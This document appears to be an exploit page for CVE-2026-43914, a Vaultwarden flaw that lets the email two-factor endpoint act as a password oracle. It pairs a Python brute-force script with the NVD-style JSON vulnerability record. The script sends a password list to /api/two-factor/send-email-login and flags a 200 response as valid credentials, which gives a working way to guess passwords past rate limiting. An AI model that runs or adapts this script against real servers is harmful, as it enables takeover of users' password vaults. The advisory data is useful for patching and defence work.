CVE-2026-43914

import requests # Target URL (Replace with actual target) target_url = "https://example.com/api/two-factor/send-email-login" # User credentials to test username = "[email protected]" password_list = ["password123", "admin", "123456", "letmein"] headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } print(f"[*] Starting brute force test against {target_url}") for password in password_list: payload = { "email": username, "password": password, "masterPasswordHash": password # Depending on specific API implementation } try: response = requests.post(target_url, json=payload, headers=headers, timeout=5) # Analysis: If the endpoint returns 200 OK, it usually means credentials are valid # and the system attempted to send an email. # If credentials are invalid, it typically returns 400 Bad Request or 401 Unauthorized. if response.status_code == 200: print(f"[+] Potential valid credentials found: {username} / {password}") # In a real scenario, stop here or log success break else: print(f"[-] Failed: {username} / {password} (Status: {response.status_code})") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") print("[*] Test completed.")

{"cve": {"id": "CVE-2026-43914", "sourceIdentifier": "[email protected]", "published": "2026-05-11T23:20:22.253", "lastModified": "2026-05-11T23:20:22.253", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vaultwarden is a Bitwarden-compatible server written in Rust. Prior to 1.35.4, there is a security vulnerability in Vaultwarden that allows bypassing the login brute-force protection if email 2fa is enabled. If email 2fa is enabled, the unprotected 2fa-function send_email_login (email.rs, api endpoint /api/two-factor/send-email-login) also acts as an oracle determining whether a username-password combination is correct. An attacker can abuse that endpoint to brute-force passwords without rate-limiting. This works even for users who don't have email 2fa configured. This vulnerability is fixed in 1.35.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-307"}]}], "references": [{"url": "https://github.com/dani-garcia/vaultwarden/pull/6867", "source": "[email protected]"}, {"url": "https://github.com/dani-garcia/vaultwarden/releases/tag/1.35.4", "source": "[email protected]"}, {"url": "https://github.com/dani-garcia/vaultwarden/security/advisories/GHSA-c5rv-q295-7w4g", "source": "[email protected]"}]}}